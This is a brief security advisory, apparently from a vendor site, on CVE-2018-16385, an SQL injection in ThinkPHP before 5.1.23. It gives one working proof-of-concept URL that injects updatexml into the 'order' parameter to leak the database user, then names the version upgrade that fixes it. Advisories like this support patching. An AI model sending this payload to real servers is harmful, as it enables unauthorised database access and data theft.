SQL injection at ThinkPHP

 

 

SQL injection at ThinkPHP - CVE-2018-16385

SQL injection at ThinkPHP

Overview

ThinkPHP < 5.1.23 is vulnerable to SQL injection at public/index/index/test/index

PoC

 http://127.0.0.1/tp5/public/index/index/test/index?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1

Remediation

Update to 5.1.23 or later

Resources

Ready to be protected?

14 days trial , No credit card upfront , Risk free